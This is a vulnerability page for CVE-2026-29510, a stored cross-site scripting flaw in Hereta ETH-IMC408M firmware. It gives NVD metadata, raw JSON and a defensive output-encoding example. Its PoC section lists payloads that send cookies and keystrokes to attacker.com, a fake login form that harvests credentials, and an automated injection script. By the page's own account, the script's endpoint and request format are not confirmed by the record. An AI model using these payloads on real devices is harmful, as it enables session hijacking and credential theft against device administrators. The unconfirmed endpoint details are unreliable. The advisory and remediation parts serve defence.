Security Vulnerability Report
CVE-2026-29510 (CVSS 3.1 base score 5.4, MEDIUM)

Published: 2026-03-16 18:16:08
Last Modified: 2026-04-10 17:46:38

Description

Hereta ETH-IMC408M firmware version 1.0.15 and prior contain a stored cross-site scripting vulnerability that allows authenticated attackers to inject arbitrary JavaScript by manipulating the Device Name field. Attackers can inject malicious scripts through the System Status interface that execute in browsers of users viewing the status page without input sanitation.
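As an added example (not code from the NVD record, the VulnCheck advisory or the Hereta firmware, whose web interface is not shown on this page), the pattern the description calls "without input sanitation" beside its hardened form: the stored Device Name is encoded on output so the PoC payload from this page is displayed as text on the System Status page, with an allowlist check at write time as defence in depth. Function names and the table-row template are assumptions.

```javascript
// Added example, not vendor code. Function names and the row template are
// assumed for illustration; the payload string is the "Basic Cookie Theft"
// payload from the PoC on this page, used here only as test input.
const SAMPLE_PAYLOAD =
  '<img src=x onerror="this.src=\'http://attacker.com/steal?c=\'+document.cookie">';

// Encode the five characters that matter in HTML text and attribute context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Vulnerable pattern: the stored device name is concatenated straight into
// the status page markup, so a name containing <img onerror=...> becomes an
// element with an event handler in every viewer's browser.
function renderStatusRowUnsafe(deviceName) {
  return '<tr><td>Device Name</td><td>' + deviceName + '</td></tr>';
}

// Hardened pattern: encode on output. The stored value is unchanged, but the
// browser now parses "&lt;img ..." as text, so no element and no handler exist.
function renderStatusRow(deviceName) {
  return '<tr><td>Device Name</td><td>' + escapeHtml(deviceName) + '</td></tr>';
}

// Defence in depth at write time: a device name has no legitimate need for
// HTML metacharacters. Allowlist a conservative character set, cap the
// length, and reject anything else rather than trying to "clean" it.
function isValidDeviceName(name) {
  return typeof name === 'string' &&
    name.length >= 1 && name.length <= 64 &&
    /^[A-Za-z0-9 ._-]+$/.test(name);
}

// Stand-alone demonstration: compare the two renderings of the same name.
console.log('unsafe:   ' + renderStatusRowUnsafe(SAMPLE_PAYLOAD));
console.log('hardened: ' + renderStatusRow(SAMPLE_PAYLOAD));
console.log('valid name? ' + isValidDeviceName(SAMPLE_PAYLOAD));
```

Output encoding is the fix that closes the bug; the allowlist only narrows what can be stored and would not protect a second page that rendered the name without encoding.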

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Weakness: CWE-79 (from the NVD record's weaknesses entry)
CVSS 4.0 (secondary metric in the NVD record): 5.1 MEDIUM, CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N (trailing NOT_DEFINED modifiers omitted)

Configurations (Affected Products)

cpe:2.3:o:hereta:eth-imc408m_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:hereta:eth-imc408m:-:*:*:*:*:*:*:* - NOT VULNERABLE
Hereta ETH-IMC408M Firmware <= 1.0.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
The NVD description names only the Device Name field and the System Status page; the /api/device/name endpoint, the JSON request format and the attacker hosts in the block below are not confirmed by the record or its references. The block is HTML comments and payloads followed by browser JavaScript, not Python as originally labelled.

```html
<!-- CVE-2026-29510 PoC: Stored XSS via Device Name -->
<!-- Attack Vector: Inject JavaScript in Device Name field -->
<!-- Target: Hereta ETH-IMC408M Firmware <= 1.0.15 -->

<!-- Step 1: Login to the device web interface with low-privilege account -->
<!-- Step 2: Navigate to device configuration or System Status page -->
<!-- Step 3: Modify Device Name field with XSS payload -->

<!-- Example XSS Payloads: -->

<!-- Basic Cookie Theft -->
<img src=x onerror="this.src='http://attacker.com/steal?c='+document.cookie">

<!-- Session Hijacking -->
<script>fetch('http://attacker.com/log?cookie='+document.cookie)</script>

<!-- Keylogger -->
<script>document.addEventListener('keypress',e=>fetch('http://attacker.com/k?k='+e.key))</script>

<!-- DOM Manipulation/Phishing -->
<script>document.body.innerHTML='<h1>Session Expired. Please re-login.</h1><form action=http://attacker.com/phish><input name=username><input name=password type=password><button>Login</button></form>'</script>

<!-- Automated Exploitation Script -->
(function() {
  // Step 1: Identify vulnerable endpoint
  const targetUrl = window.location.origin;
  const deviceNameEndpoint = targetUrl + '/api/device/name';
  // Step 2: Prepare XSS payload
  const xssPayload = '<img src=x onerror="fetch(\'http://attacker.com/exploit?data=\'+btoa(document.cookie))">';
  // Step 3: Send malicious payload
  fetch(deviceNameEndpoint, {
    method: 'POST',
    headers: { 'Content-Type': 'application/json', 'Cookie': document.cookie },
    body: JSON.stringify({ device_name: xssPayload })
  }).then(response => {
    console.log('Payload sent. XSS will trigger when victim views System Status page.');
  }).catch(err => {
    console.error('Exploitation failed:', err);
  });
})();
```

References

https://web.archive.org/web/20250820105319/http://hereta.com/ (Product)
https://www.vulncheck.com/advisories/hereta-eth-imc408m-stored-xss-via-device-name (Third Party Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-29510", "sourceIdentifier": "[email protected]", "published": "2026-03-16T18:16:08.020", "lastModified": "2026-04-10T17:46:37.863", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hereta ETH-IMC408M firmware version 1.0.15 and prior contain a stored cross-site scripting vulnerability that allows authenticated attackers to inject arbitrary JavaScript by manipulating the Device Name field. Attackers can inject malicious scripts through the System Status interface that execute in browsers of users viewing the status page without input sanitation."}, {"lang": "es", "value": "Hereta ETH-IMC408M firmware versión 1.0.15 y anteriores contienen una vulnerabilidad de cross-site scripting almacenado que permite a atacantes autenticados inyectar JavaScript arbitrario manipulando el campo Device Name. Los atacantes pueden inyectar scripts maliciosos a través de la interfaz System Status que se ejecutan en los navegadores de los usuarios que ven la página de estado sin saneamiento de entrada."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hereta:eth-imc408m_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.0.15", "matchCriteriaId": "9E114378-9A8F-4EC3-A7B3-89DF7D6BBEC0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hereta:eth-imc408m:-:*:*:*:*:*:*:*", "matchCriteriaId": "D3C670E1-A5ED-4FC7-8150-0B62411371F9"}]}]}], "references": [{"url": "https://web.archive.org/web/20250820105319/http://hereta.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/hereta-eth-imc408m-stored-xss-via-device-name", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
```